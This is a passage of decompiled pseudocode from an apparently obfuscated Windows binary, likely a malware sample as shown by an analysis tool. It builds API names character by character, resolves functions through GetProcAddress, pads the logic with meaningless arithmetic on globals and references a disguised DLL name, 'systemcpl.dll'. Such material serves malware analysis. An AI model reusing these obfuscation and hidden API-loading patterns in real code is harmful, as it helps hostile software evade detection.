      							 *_t3558 = 1;
      							E0040A34C( &_v1164, 0xf,  &_v420);
      							E0040A324( &_v1184,  &_v1164);
      							E0040A34C( &_v1184, 0x10, 0x86f590);
      							E0040A324( &_v1204,  &_v1184);
      							_t3567 =  &_v420;
      							_t5016 =  *0x8aa15c; // 0x8b091c
      							 *((char*)(_t3567 + 1)) =  *_t5016;
      							 *_t3567 = 1;
      							E0040A34C( &_v1204, 0x11,  &_v420);
      							E0040A324( &_v1224,  &_v1204);
      							_t3572 =  &_v420;
      							_t5020 =  *0x8a9ce4; // 0x8b0912
      							 *((char*)(_t3572 + 1)) =  *_t5020;
      							 *_t3572 = 1;
      							E0040A34C( &_v1224, 0x12,  &_v420);
      							E0040A324( &_v1244,  &_v1224);
      							_t3577 =  &_v420;
      							_t5024 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3577 + 1)) =  *_t5024;
      							 *_t3577 = 1;
      							E0040A34C( &_v1244, 0x13,  &_v420);
      							E0040A324( &_v1268,  &_v1244);
      							_t3582 =  &_v420;
      							_t5028 =  *0x8a9ffc; // 0x8b091a
      							 *((char*)(_t3582 + 1)) =  *_t5028;
      							 *_t3582 = 1;
      							E0040A34C( &_v1268, 0x14,  &_v420);
      							E0040A324( &_v1292,  &_v1268);
      							_t3587 =  &_v420;
      							_t5032 =  *0x8a9f8c; // 0x8b0915
      							 *((char*)(_t3587 + 1)) =  *_t5032;
      							 *_t3587 = 1;
      							E0040A34C( &_v1292, 0x15,  &_v420);
      							E0040A324( &_v1316,  &_v1292);
      							_t3592 =  &_v420;
      							_t5036 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3592 + 1)) =  *_t5036;
      							 *_t3592 = 1;
      							E0040A34C( &_v1316, 0x16,  &_v420);
      							E0040A324( &_v1340,  &_v1316);
      							_t3597 =  &_v420;
      							_t5040 =  *0x8a9c3c; // 0x8b0918
      							 *((char*)(_t3597 + 1)) =  *_t5040;
      							 *_t3597 = 1;
      							E0040A34C( &_v1340, 0x17,  &_v420);
      							E0040A324( &_v1368,  &_v1340);
      							_t3602 =  &_v420;
      							_t5044 =  *0x8a9ffc; // 0x8b091a
      							 *((char*)(_t3602 + 1)) =  *_t5044;
      							 *_t3602 = 1;
      							E0040A34C( &_v1368, 0x18,  &_v420);
      							E0040A324( &_v1396,  &_v1368);
      							_t3607 =  &_v420;
      							_t5048 =  *0x8aa15c; // 0x8b091c
      							 *((char*)(_t3607 + 1)) =  *_t5048;
      							 *_t3607 = 1;
      							E0040A34C( &_v1396, 0x19,  &_v420);
      							E0040A324( &_v1424,  &_v1396);
      							E0040A34C( &_v1424, 0x1a, 0x86f590);
      							E0040A324( &_v1452,  &_v1424);
      							_t3616 =  &_v420;
      							_t5054 =  *0x8a9f14; // 0x8b0922
      							 *((char*)(_t3616 + 1)) =  *_t5054;
      							 *_t3616 = 1;
      							E0040A34C( &_v1452, 0x1b,  &_v420);
      							E0040A444( &_v1116, 0,  &_v1452, _t5280);
      							_push(_v1116);
      							E006BA5A8(1,  &_v1456, _t5280);
      							_push(_v1456);
      							_push(0x86f5a0);
      							E006BA5A8(1,  &_v1460, _t5280);
      							_push(_v1460);
      							_push(0x86f5a0);
      							E006BA5A8(0,  &_v1464, _t5280);
      							_push(_v1464);
      							_push(0x86f534);
      							E0040A3C0(0);
      							_push(_v1468);
      							E0040A3C0(0);
      							_push(_v1472);
      							E0040A3C0(0);
      							E0040A494( &_v1112, _t3910, 0xa, _t5187, _t5188);
      							E0040A9E8( &_v20, _v1112, _v1476);
      							E0040A0C0( &_v16, L"systemcpl.dll");
      						}
      					}
      					E0040A0C0( &_v12, _v16);
      					E0040A0C0( &_v12, _v16);
      					if(_v60 <= _v72) {
      						E0040A0C0( &_v20, _v12);
      					} else {
      						E0040ACEC(_v20, 2, 1,  &_v12);
      					}
      					_t2695 =  *0x8a9f40; // 0x8b0925
      					_v113 =  *_t2695;
      					if(_v113 + 0x9f - 0x1a < 0) {
      						_v113 = _v113 - 0x20;
      					}
      					_t2700 =  *0x8aa0b4; // 0x8b091f
      					_v114 =  *_t2700;
      					if(_v114 + 0x9f - 0x1a < 0) {
      						_v114 = _v114 - 0x20;
      					}
      					_t2705 =  *0x8aa15c; // 0x8b091c
      					_v115 =  *_t2705;
      					if(_v115 + 0x9f - 0x1a < 0) {
      						_v115 = _v115 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v1484);
      					E0040A3C0(0);
      					_push(_v1488);
      					E0040A3C0(0);
      					_push(_v1492);
      					E0040A3C0(0);
      					_push(_v1496);
      					E0040A3C0(0);
      					_push(_v1500);
      					E0040A3C0(0);
      					_push(_v1504);
      					E0040A3C0(0);
      					_push(_v1508);
      					E0040A3C0(0);
      					_push(_v1512);
      					E0040A3C0(0);
      					_push(_v1516);
      					E0040A3C0(0);
      					_push(_v1520);
      					E0040A3C0(0);
      					_push(_v1524);
      					E0040A3C0(0);
      					_push(_v1528);
      					E0040A3C0(0);
      					_push(_v1532);
      					E0040A494( &_v1480, _t3910, 0xd, _t5187, _t5188);
      					 *0x8b1250 = GetProcAddress(_v8, E0040A594(_v1480));
      					_v64 = 0;
      					while(_v64 < 7) {
      						_v64 = _v64 + 1;
      						_v424 = _v60 + 4;
      						asm("fild dword [ebp-0x1a4]");
      						_v52 = E004076F4();
      						 *0x8a9b2c = 0;
      						E0085E4BC();
      						_v48 = 0;
      						if(_v48 < 0xc) {
      							_v48 = _v48 + 1;
      							asm("fild dword [ebp-0x18]");
      							_v76 = E004076F4();
      							asm("fild dword [ebp-0x40]");
      							_v32 = E004076F4();
      							_t3404 =  *0x8a9b54; // 0xfcfc377e
      							 *0x8a9adc = _t3404 *  *0x8a9aa0;
      							asm("fild dword [0x8a9b3c]");
      							 *0x8a9bbc = E004076F4();
      							_t3407 =  *0x8a9b68; // 0x74d3d365
      							 *0x8a9ab8 = _t3407;
      							_t3408 =  *0x8a9b20; // 0xbfd15606
      							 *0x8a9b58 = _t3408 -  *0x8a9b38;
      						}
      						if(0x4c - _v60 < 0xa2) {
      							_t3392 =  *0x8a9b70; // 0x20ba273a
      							 *0x8a9b94 = _t3392 - 0xdc;
      							_t3394 =  *0x8a9b28; // 0xfbe6deff
      							 *0x8a9aa4 = _t3394 *  *0x8a9b38;
      							_t3396 =  *0x8a9b14; // 0xfbe6deb5
      							 *0x8a9b84 = _t3396 *  *0x8a9b68;
      							_t3398 =  *0x8a9bb4; // 0x60792cbd
      							 *0x8a9abc = _t3398;
      							_t3399 =  *0x8a9b28; // 0xfbe6deff
      							 *0x8a9b68 = _t3399;
      							_t3400 =  *0x8a9ac8; // 0x6009aad3
      							 *0x8a9a74 = _t3400 -  *0x8a9a5c;
      						}
      					}
      					 *0x8a9aa4 = 0x33 -  *0x8a9a40;
      					_t2745 =  *0x8a9a6c; // 0xfbe7a61a
      					 *0x8a9aa4 = _t2745;
      					 *0x8a9b20 = 0;
      					E0085E4BC();
      					_t2748 =  *0x8a9a1c; // 0x0
      					_v120 = _t2748;
      					if(_v120 != 0) {
      						_v120 =  *((intOrPtr*)(_v120 - 4));
      					}
      					if(_v120 != 7) {
      						_t2749 =  *0x8a9b34; // 0xedbf3fa1
      						_t4649 =  *0x8a9a6c; // 0xfbe7a61a
      						__eflags = _t2749 +  *0x8a9b20 - _t4649 +  *0x8a9b34;
      						if(_t2749 +  *0x8a9b20 < _t4649 +  *0x8a9b34) {
      							_t3369 =  *0x8a9b80; // 0x60792cbd
      							 *0x8a9a5c = _t3369 -  *0x8a9b34;
      							_t3371 =  *0x8a9b68; // 0x74d3d365
      							 *0x8a9b4c = _t3371 -  *0x8a9b68;
      							asm("fild dword [0x8a9b18]");
      							 *0x8a9aa0 = E004076F4();
      							_t3374 =  *0x8a9b44; // 0x892c9cf8
      							 *0x8a9b38 = _t3374;
      							_t3375 =  *0x8a9b6c; // 0x6009aa4c
      							 *0x8a9bbc = _t3375 - 0xc;
      							_t3377 =  *0x8a9a50; // 0x3408bc9
      							_t3378 = _t3377 - 9;
      							__eflags = _t3378;
      							 *0x8a9aa0 = _t3378;
      						}
      					} else {
      						_t3379 =  *0x8a99e0; // 0x722ec333
      						 *0x8a9b84 = _t3379 + 0x4c;
      					}
      					_t2751 =  *0x8a9ba0; // 0x6009aac0
      					 *0x8a9b20 = _t2751 + 0x43;
      					_t2753 =  *0x8a9f40; // 0x8b0925
      					_v121 =  *_t2753;
      					if(_v121 + 0x9f - 0x1a < 0) {
      						_v121 = _v121 - 0x20;
      					}
      					_t2758 =  *0x8a9e34; // 0x8b091e
      					_v122 =  *_t2758;
      					if(_v122 + 0x9f - 0x1a < 0) {
      						_v122 = _v122 - 0x20;
      					}
      					_t2763 =  *0x8aa0b4; // 0x8b091f
      					_v123 =  *_t2763;
      					if(_v123 + 0x9f - 0x1a < 0) {
      						_v123 = _v123 - 0x20;
      					}
      					_t2768 =  *0x8aa104; // 0x8b0919
      					_v124 =  *_t2768;
      					if(_v124 + 0x9f - 0x1a < 0) {
      						_v124 = _v124 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v1540);
      					E0040A3C0(0);
      					_push(_v1544);
      					E0040A3C0(0);
      					_push(_v1548);
      					E0040A3C0(0);
      					_push(_v1552);
      					E0040A3C0(0);
      					_push(_v1556);
      					E0040A3C0(0);
      					_push(_v1560);
      					E0040A3C0(0);
      					_push(_v1564);
      					E0040A3C0(0);
      					_push(_v1568);
      					E0040A3C0(0);
      					_push(_v1572);
      					E0040A3C0(0);
      					_push(_v1576);
      					E0040A3C0(0);
      					_push(_v1580);
      					E0040A3C0(0);
      					_push(_v1584);
      					E0040A3C0(0);
      					_push(_v1588);
      					E0040A3C0(0);
      					_push(_v1592);
      					E0040A3C0(0);
      					_push(_v1596);
      					E0040A3C0(0);
      					_push(_v1600);
      					E0040A3C0(0);
      					_push(_v1604);
      					E0040A494( &_v1536, _t3910, 0x11, _t5187, _t5188);
      					 *0x8b1258 = GetProcAddress(_v8, E0040A594(_v1536));
      					_v64 = 0;
      					if(_v64 < 9) {
      						_v64 = _v64 + 1;
      						_t3366 =  *0x8a9a5c; // 0x74d3d365
      						 *0x8a9b24 = _t3366;
      						_v52 = _v44 - 0x6c;
      					}
      					_t2814 =  *0x8a9b34; // 0xedbf3fa1
      					_t5305 = _t2814 -  *0x8a9b4c; // 0x4d1a0eb9
      					if(_t5305 > 0) {
      						if(_v56 + _v60 != _v60) {
      							asm("fild dword [0x8a9b6c]");
      							 *0x8a9a58 = E004076E8();
      							 *0x8a9b08 = 0xf1 -  *0x8a9b24;
      							_t3329 =  *0x8a9b18; // 0x194
      							 *0x8a9b94 = _t3329 *  *0x8a9b6c;
      							_t3331 =  *0x8a9ab8; // 0xfcfc377e
      							 *0x8a9aa4 = _t3331 +  *0x8a9a8c;
      							_t3333 =  *0x8a9b2c; // 0x9a36d255
      							 *0x8a9b70 = _t3333;
      							_t3334 =  *0x8a9a38; // 0x438e1da9
      							_t3335 = _t3334 + 0x45;
      							__eflags = _t3335;
      							 *0x8a9a9c = _t3335;
      						} else {
      							_v68 = _v36 + 0xa6;
      							_v424 = _v24 + 4;
      							asm("fild dword [ebp-0x1a4]");
      							_v76 = E004076F4();
      							_v32 = _v28 * 0xd7;
      							_t3360 =  *0x8a9bc0; // 0x86ef288d
      							 *0x8a9ae0 = _t3360 + 4;
      							_t3362 =  *0x8a9ba0; // 0x6009aac0
      							 *0x8a9bbc = _t3362 *  *0x8a9bb0;
      							_t3364 =  *0x8a9a34; // 0xe22aa3e4
      							 *0x8a9b08 = _t3364 +  *0x8a9b64;
      						}
      						_t3336 =  *0x8a9a5c; // 0x74d3d365
      						 *0x8a9af0 = _t3336;
      						_t3337 =  *0x8a9b78; // 0x12d6c
      						 *0x8a9ba0 = _t3337;
      						_t3338 =  *0x8a9a70; // 0x60792d03
      						 *0x8a9a70 = E00407278(_t3338);
      						_t3340 =  *0x8a9a70; // 0x60792d03
      						_t5307 = _t3340 -  *0x8a9ba0; // 0x6009aac0
      						if(_t5307 > 0) {
      							_t3343 =  *0x8a9ad4; // 0xba811226
      							 *0x8a9ba0 = _t3343 + 0xb;
      							_t3345 =  *0x8a9b78; // 0x12d6c
      							 *0x8a9ad8 = _t3345 - 6;
      							asm("fild dword [0x8a9b38]");
      							 *0x8a9b30 = E004076F4();
      							_t3348 =  *0x8a9a88; // 0xb09b9fd8
      							 *0x8a9ba4 = _t3348 *  *0x8a9ba4;
      							_t3350 =  *0x8a9a8c; // 0x7acda9e0
      							 *0x8a9a90 = _t3350 *  *0x8a9b38;
      							_t3352 = E008A9B04; // 0xc1b26c1f
      							 *0x8a9b5c = _t3352 - 0x2b;
      						}
      						E0040A0C0( &_v12, _v20);
      					}
      					_t2815 =  *0x8a9b50; // 0x36c714d5
      					 *0x8a9b14 = _t2815;
      					if(_v64 + _v56 != _v56) {
      						_t2818 =  *0x8a9b08; // 0x722ec337
      						_t2819 = _t2818 +  *0x8a9af4;
      						__eflags = _t2819;
      						 *0x8a9ba4 = _t2819;
      					} else {
      						asm("fild dword [0x8a9ad8]");
      						 *0x8a9b38 = E004076E8();
      					}
      					_t2820 =  *0x8a9b34; // 0xedbf3fa1
      					_v424 = _t2820 + 4;
      					asm("fild dword [ebp-0x1a4]");
      					 *0x8a9b4c = E004076F4();
      					E0040A0C0( &_v12, _v16);
      					_t2825 =  *0x8a9f40; // 0x8b0925
      					_v125 =  *_t2825;
      					if(_v125 + 0x9f - 0x1a < 0) {
      						_v125 = _v125 - 0x20;
      					}
      					_t2830 =  *0x8aa15c; // 0x8b091c
      					_v126 =  *_t2830;
      					if(_v126 + 0x9f - 0x1a < 0) {
      						_v126 = _v126 - 0x20;
      					}
      					_t2835 =  *0x8aa1dc; // 0x8b0921
      					_v127 =  *_t2835;
      					if(_v127 + 0x9f - 0x1a < 0) {
      						_v127 = _v127 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v1612);
      					E0040A3C0(0);
      					_push(_v1616);
      					E0040A3C0(0);
      					_push(_v1620);
      					E0040A3C0(0);
      					_push(_v1624);
      					E0040A3C0(0);
      					_push(_v1628);
      					E0040A3C0(0);
      					_push(_v1632);
      					E0040A3C0(0);
      					_push(_v1636);
      					E0040A3C0(0);
      					_push(_v1640);
      					E0040A3C0(0);
      					_push(_v1644);
      					E0040A3C0(0);
      					_push(_v1648);
      					E0040A3C0(0);
      					_push(_v1652);
      					E0040A3C0(0);
      					_push(_v1656);
      					E0040A3C0(0);
      					_push(_v1660);
      					E0040A3C0(0);
      					_push(_v1664);
      					E0040A494( &_v1608, _t3910, 0xe, _t5187, _t5188);
      					 *0x8b1254 = GetProcAddress(_v8, E0040A594(_v1608));
      					_v36 = 0;
      					E0085E4BC();
      					_t2876 =  *0x8a9a40; // 0xe6ca04f5
      					 *0x8a9ac0 = _t2876;
      					_v64 = 0;
      					while(_v64 < 8) {
      						_v64 = _v64 + 1;
      						_v68 = 0;
      						while(_v68 < 7) {
      							_v68 = _v68 + 1;
      							_v76 = _v60 * _v28;
      							_v32 = _v48 * _v24;
      							_v40 = _v56 - 0xf5;
      							_t3318 =  *0x8a9a8c; // 0x7acda9e0
      							 *0x8a9b20 = _t3318 +  *0x8a9b00;
      							_t3320 =  *0x8a99e4; // 0x7c5162fc
      							 *0x8a9bb4 = _t3320 - 0xe8;
      							 *0x8a9ae4 =  *0x8a9af0 * 0xe3;
      						}
      					}
      					E0040ACEC(_v20, 2, 1,  &_v12);
      					 *0x8a9b60 = 0;
      					E0085E4BC();
      					 *0x8a9af4 = 0xb9 -  *0x8a9adc;
      					_t2885 =  *0x8a9f40; // 0x8b0925
      					_v128 =  *_t2885;
      					if(_v128 + 0x9f - 0x1a < 0) {
      						_v128 = _v128 - 0x20;
      					}
      					_t2890 =  *0x8aa15c; // 0x8b091c
      					_v129 =  *_t2890;
      					if(_v129 + 0x9f - 0x1a < 0) {
      						_v129 = _v129 - 0x20;
      					}
      					_t2895 =  *0x8aa0b4; // 0x8b091f
      					_v130 =  *_t2895;
      					if(_v130 + 0x9f - 0x1a < 0) {
      						_v130 = _v130 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v1672);
      					E0040A3C0(0);
      					_push(_v1676);
      					E0040A3C0(0);
      					_push(_v1680);
      					E0040A3C0(0);
      					_push(_v1684);
      					E0040A3C0(0);
      					_push(_v1688);
      					E0040A3C0(0);
      					_push(_v1692);
      					E0040A3C0(0);
      					_push(_v1696);
      					E0040A3C0(0);
      					_push(_v1700);
      					E0040A3C0(0);
      					_push(_v1704);
      					E0040A3C0(0);
      					_push(_v1708);
      					E0040A3C0(0);
      					_push(_v1712);
      					E0040A3C0(0);
      					_push(_v1716);
      					E0040A3C0(0);
      					_push(_v1720);
      					E0040A3C0(0);
      					_push(_v1724);
      					E0040A3C0(0);
      					_push(_v1728);
      					E0040A3C0(0);
      					_push(_v1732);
      					E0040A494( &_v1668, _t3910, 0x10, _t5187, _t5188);
      					 *0x8b125c = GetProcAddress(_v8, E0040A594(_v1668));
      					_t2938 =  *0x8a9e34; // 0x8b091e
      					_v131 =  *_t2938;
      					if(_v131 + 0x9f - 0x1a < 0) {
      						_v131 = _v131 - 0x20;
      					}
      					_t2943 =  *0x8a9f40; // 0x8b0925
      					_v132 =  *_t2943;
      					if(_v132 + 0x9f - 0x1a < 0) {
      						_v132 = _v132 - 0x20;
      					}
      					_t2948 =  *0x8aa0b4; // 0x8b091f
      					_v133 =  *_t2948;
      					if(_v133 + 0x9f - 0x1a < 0) {
      						_v133 = _v133 - 0x20;
      					}
      					_t2953 =  *0x8aa104; // 0x8b0919
      					_v134 =  *_t2953;
      					if(_v134 + 0x9f - 0x1a < 0) {
      						_v134 = _v134 - 0x20;
      					}
      					_t2958 =  *0x8a9cf4; // 0x8b0911
      					_v135 =  *_t2958;
      					if(_v135 + 0x9f - 0x1a < 0) {
      						_v135 = _v135 - 0x20;
      					}
      					E0040A3C0(0);
      					_push(_v1740);
      					E0040A3C0(0);
      					_push(_v1744);
      					E0040A3C0(0);
      					_push(_v1748);
      					E0040A3C0(0);
      					_push(_v1752);
      					E0040A3C0(0);
      					_push(_v1756);
      					E0040A3C0(0);
      					_push(_v1760);
      					E0040A3C0(0);
      					_push(_v1764);
      					E0040A3C0(0);
      					_push(_v1768);
      					E0040A3C0(0);
      					_push(_v1772);
      					E0040A3C0(0);
      					_push(_v1776);
      					E0040A3C0(0);
      					_push(_v1780);
      					E0040A3C0(0);
      					_push(_v1784);
      					E0040A3C0(0);
      					_push(_v1788);
      					E0040A3C0(0);
      					_push(_v1792);
      					E0040A3C0(0);
      					_push(_v1796);
      					E0040A3C0(0);
      					_push(_v1800);
      					E0040A3C0(0);
      					_push(_v1804);
      					E0040A3C0(0);
      					_push(_v1808);
      					E0040A3C0(0);
      					_push(_v1812);
      					E0040A3C0(0);
      					_push(_v1816);
      					E0040A494( &_v1736, _t3910, 0x14, _t5187, _t5188);
      					 *0x8b1240 = GetProcAddress(_v8, E0040A594(_v1736));
      					_v52 = _v48 + 4;
      					_v64 = 0;
      					if(_v64 >= 9) {
      						L200:
      						_t3012 =  *0x8a9e34; // 0x8b091e
      						_v151 =  *_t3012;
      						__eflags = _v151 + 0x9f - 0x1a;
      						if(_v151 + 0x9f - 0x1a < 0) {
      							_t1564 =  &_v151;
      							 *_t1564 = _v151 - 0x20;
      							__eflags =  *_t1564;
      						}
      						_t3017 =  *0x8aa080; // 0x8b0916
      						_v152 =  *_t3017;
      						__eflags = _v152 + 0x9f - 0x1a;
      						if(_v152 + 0x9f - 0x1a < 0) {
      							_t1568 =  &_v152;
      							 *_t1568 = _v152 - 0x20;
      							__eflags =  *_t1568;
      						}
      						_t3022 =  *0x8aa104; // 0x8b0919
      						_v153 =  *_t3022;
      						__eflags = _v153 + 0x9f - 0x1a;
      						if(_v153 + 0x9f - 0x1a < 0) {
      							_t1572 =  &_v153;
      							 *_t1572 = _v153 - 0x20;
      							__eflags =  *_t1572;
      						}
      						_t3027 =  *0x8aa080; // 0x8b0916
      						_v154 =  *_t3027;
      						__eflags = _v154 + 0x9f - 0x1a;
      						if(_v154 + 0x9f - 0x1a < 0) {
      							_t1576 =  &_v154;
      							 *_t1576 = _v154 - 0x20;
      							__eflags =  *_t1576;
      						}
      						_t3032 =  *0x8a9fd0; // 0x8b0917
      						_v155 =  *_t3032;
      						__eflags = _v155 + 0x9f - 0x1a;
      						if(_v155 + 0x9f - 0x1a < 0) {
      							_t1580 =  &_v155;
      							 *_t1580 = _v155 - 0x20;
      							__eflags =  *_t1580;
      						}
      						_t3037 =  *0x8a9f14; // 0x8b0922
      						_v156 =  *_t3037;
      						__eflags = _v156 + 0x9f - 0x1a;
      						if(_v156 + 0x9f - 0x1a < 0) {
      							_t1584 =  &_v156;
      							 *_t1584 = _v156 - 0x20;
      							__eflags =  *_t1584;
      						}
      						E0040A3C0(0);
      						_push(_v1944);
      						E0040A3C0(0);
      						_push(_v1948);
      						E0040A3C0(0);
      						_push(_v1952);
      						E0040A3C0(0);
      						_push(_v1956);
      						E0040A3C0(0);
      						_push(_v1960);
      						E0040A3C0(0);
      						_push(_v1964);
      						E0040A3C0(0);
      						_push(_v1968);
      						E0040A3C0(0);
      						_push(_v1972);
      						E0040A3C0(0);
      						_push(_v1976);
      						E0040A3C0(0);
      						_push(_v1980);
      						E0040A3C0(0);
      						_push(_v1984);
      						E0040A3C0(0);
      						_push(_v1988);
      						E0040A3C0(0);
      						_push(_v1992);
      						E0040A3C0(0);
      						_push(_v1996);
      						E0040A3C0(0);
      						_push(_v2000);
      						E0040A3C0(0);
      						_push(_v2004);
      						E0040A3C0(0);
      						_push(_v2008);
      						E0040A3C0(0);
      						_push(_v2012);
      						E0040A3C0(0);
      						_push(_v2016);
      						E0040A3C0(0);
      						_push(_v2020);
      						E0040A3C0(0);
      						_push(_v2024);
      						E0040A3C0(0);
      						_push(_v2028);
      						E0040A3C0(0);
      						_push(_v2032);
      						E0040A3C0(0);
      						_push(_v2036);
      						E0040A3C0(0);
      						_push(_v2040);
      						E0040A3C0(0);
      						_push(_v2044);
      						E0040A3C0(0);
      						E0040A494( &_v1940, _t3910, 0x1b, _t5187, _t5188);
      						E0040A9E8( &_v20, _v1940, _v2048);
      						E0040A0C0( &_v12, _v20);
      						E0040A0C0( &_v16, _v12);
      						_push(_t5190);
      						_push(0x862ccb);
      						_push( *[fs:eax]);
      						 *[fs:eax] = _t5191;
      						_t3105 =  *0x8a9f40; // 0x8b0925
      						_v157 =  *_t3105;
      						__eflags = _v157 + 0x9f - 0x1a;
      						if(_v157 + 0x9f - 0x1a < 0) {
      							_t1655 =  &_v157;
      							 *_t1655 = _v157 - 0x20;
      							__eflags =  *_t1655;
      						}
      						_t3110 =  *0x8aa0b8; // 0x8b0928
      						_v158 =  *_t3110;
      						__eflags = _v158 + 0x9f - 0x1a;
      						if(_v158 + 0x9f - 0x1a < 0) {
      							_t1659 =  &_v158;
      							 *_t1659 = _v158 - 0x20;
      							__eflags =  *_t1659;
      						}
      						_t3115 =  *0x8a9fcc; // 0x8b0927
      						_v159 =  *_t3115;
      						__eflags = _v159 + 0x9f - 0x1a;
      						if(_v159 + 0x9f - 0x1a < 0) {
      							_t1663 =  &_v159;
      							 *_t1663 = _v159 - 0x20;
      							__eflags =  *_t1663;
      						}
      						_t3120 =  *0x8a9d20; // 0x8b0920
      						_v160 =  *_t3120;
      						__eflags = _v160 + 0x9f - 0x1a;
      						if(_v160 + 0x9f - 0x1a < 0) {
      							_t1667 =  &_v160;
      							 *_t1667 = _v160 - 0x20;
      							__eflags =  *_t1667;
      						}
      						_t3125 =  *0x8a9c3c; // 0x8b0918
      						_v161 =  *_t3125;
      						__eflags = _v161 + 0x9f - 0x1a;
      						if(_v161 + 0x9f - 0x1a < 0) {
      							_t1671 =  &_v161;
      							 *_t1671 = _v161 - 0x20;
      							__eflags =  *_t1671;
      						}
      						_t3130 =  *0x8aa104; // 0x8b0919
      						_v162 =  *_t3130;
      						__eflags = _v162 + 0x9f - 0x1a;
      						if(__eflags < 0) {
      							_t1675 =  &_v162;
      							 *_t1675 = _v162 - 0x20;
      							__eflags =  *_t1675;
      						}
      						E0040A3C0(0);
      						_push(_v2052);
      						E0040A3C0(0);
      						_push(_v2056);
      						E0040A3C0(0);
      						_push(_v2060);
      						E0040A3C0(0);
      						_push(_v2064);
      						E0040A3C0(0);
      						_push(_v2068);
      						E0040A3C0(0);
      						_push(_v2072);
      						E006BA5A8(7,  &_v2076, __eflags);
      						_push(_v2076);
      						E0040A494( &_v168, _t3910, 7, _t5187, _t5188);
      						_t3151 =  *0x8a9ce4; // 0x8b0912
      						_v163 =  *_t3151;
      						__eflags = _v163 + 0x9f - 0x1a;
      						if(_v163 + 0x9f - 0x1a < 0) {
      							_t1700 =  &_v163;
      							 *_t1700 = _v163 - 0x20;
      							__eflags =  *_t1700;
      						}
      						_t3156 =  *0x8aa15c; // 0x8b091c
      						_v169 =  *_t3156;
      						__eflags = _v169 + 0x9f - 0x1a;
      						if(_v169 + 0x9f - 0x1a < 0) {
      							_t1704 =  &_v169;
      							 *_t1704 = _v169 - 0x20;
      							__eflags =  *_t1704;
      						}
      						_t3161 =  *0x8a9f14; // 0x8b0922
      						_v170 =  *_t3161;
      						__eflags = _v170 + 0x9f - 0x1a;
      						if(_v170 + 0x9f - 0x1a < 0) {
      							_t1708 =  &_v170;
      							 *_t1708 = _v170 - 0x20;
      							__eflags =  *_t1708;
      						}
      						_t3166 =  *0x8a9f14; // 0x8b0922
      						_v171 =  *_t3166;
      						__eflags = _v171 + 0x9f - 0x1a;
      						if(_v171 + 0x9f - 0x1a < 0) {
      							_t1712 =  &_v171;
      							 *_t1712 = _v171 - 0x20;
      							__eflags =  *_t1712;
      						}
      						_push(_v168);
      						E0040A3C0(0);
      						_push(_v2084);
      						_push(0x86f534);
      						E0040A3C0(0);
      						_push(_v2088);
      						E0040A3C0(0);
      						_push(_v2092);
      						E0040A3C0(0);
      						E0040A494( &_v2080, _t3910, 6, _t5187, _t5188);
      						E0040A9E8( &_v20, _v2080, _v2096);
      						__eflags = 0;
      						_pop(_t4842);
      						 *[fs:eax] = _t4842;
      						_push(0x862cd2);
      						return E00409CBC( &_v168);
      					} else {
      						while(1) {
      							_v64 = _v64 + 1;
      							if(_v60 - _v76 < 0x43) {
      								break;
      							}
      							__eflags = _v64 - 9;
      							if(_v64 < 9) {
      								continue;
      							} else {
      								goto L200;
      							}
      							goto L252;
      						}
      						_v72 = _v36 * _v24;
      						_v28 = _v44 + 4;
      						E0040A0C0( &_v16, _v16);
      						_t3194 =  *0x8a9ffc; // 0x8b091a
      						_v136 =  *_t3194;
      						if(_v136 + 0x9f - 0x1a < 0) {
      							_v136 = _v136 - 0x20;
      						}
      						_t3199 =  *0x8a9fbc; // 0x8b0929
      						_v137 =  *_t3199;
      						if(_v137 + 0x9f - 0x1a < 0) {
      							_v137 = _v137 - 0x20;
      						}
      						_t3204 =  *0x8a9ffc; // 0x8b091a
      						_v138 =  *_t3204;
      						if(_v138 + 0x9f - 0x1a < 0) {
      							_v138 = _v138 - 0x20;
      						}
      						E0040A3C0(0);
      						_push(_v1824);
      						E0040A3C0(0);
      						_push(_v1828);
      						E0040A3C0(0);
      						_push(_v1832);
      						E0040A3C0(0);
      						_push(_v1836);
      						E0040A3C0(0);
      						_push(_v1840);
      						E0040A3C0(0);
      						_push(_v1844);
      						E0040A3C0(0);
      						_push(_v1848);
      						E0040A3C0(0);
      						_push(_v1852);
      						E0040A3C0(0);
      						_push(_v1856);
      						E0040A3C0(0);
      						_push(_v1860);
      						E0040A3C0(0);
      						_push(_v1864);
      						E0040A3C0(0);
      						_push(_v1868);
      						E0040A3C0(0);
      						_push(_v1872);
      						E0040A3C0(0);
      						_push(_v1876);
      						E0040A3C0(0);
      						E0040A494( &_v1820, _t3910, 0xf, _t5187, _t5188);
      						E0040A9E8( &_v16, _v1820, _v1880);
      						E0040A0C0( &_v12, _v16);
      						_push(_t5190);
      						_push(0x8625da);
      						_push( *[fs:eax]);
      						 *[fs:eax] = _t5191;
      						_t3246 =  *0x8aa02c; // 0x8b0926
      						_v139 =  *_t3246;
      						if(_v139 + 0x9f - 0x1a < 0) {
      							_v139 = _v139 - 0x20;
      						}
      						_t3251 =  *0x8aa080; // 0x8b0916
      						_v140 =  *_t3251;
      						if(_v140 + 0x9f - 0x1a < 0) {
      							_v140 = _v140 - 0x20;
      						}
      						_t3256 =  *0x8a9fd0; // 0x8b0917
      						_v141 =  *_t3256;
      						if(_v141 + 0x9f - 0x1a < 0) {
      							_t1509 =  &_v141;
      							 *_t1509 = _v141 - 0x20;
      							_t5349 =  *_t1509;
      						}
      						E0040A3C0(0);
      						_push(_v1884);
      						E0040A3C0(0);
      						_push(_v1888);
      						E0040A3C0(0);
      						_push(_v1892);
      						E0040A3C0(0);
      						_push(_v1896);
      						E0040A3C0(0);
      						_push(_v1900);
      						E006BA5A8(2,  &_v1904, _t5349);
      						_push(_v1904);
      						E0040A494( &_v148, _t3910, 6, _t5187, _t5188);
      						_t3275 =  *0x8a9e00; // 0x8b091d
      						_v142 =  *_t3275;
      						if(_v142 + 0x9f - 0x1a < 0) {
      							_v142 = _v142 - 0x20;
      						}
      						_t3280 =  *0x8aa080; // 0x8b0916
      						_v149 =  *_t3280;
      						if(_v149 + 0x9f - 0x1a < 0) {
      							_v149 = _v149 - 0x20;
      						}
      						_t3285 =  *0x8a9fd0; // 0x8b0917
      						_v150 =  *_t3285;
      						if(_v150 + 0x9f - 0x1a < 0) {
      							_t1537 =  &_v150;
      							 *_t1537 = _v150 - 0x20;
      							_t5355 =  *_t1537;
      						}
      						_push(_v148);
      						E0040A3C0(0);
      						_push(_v1912);
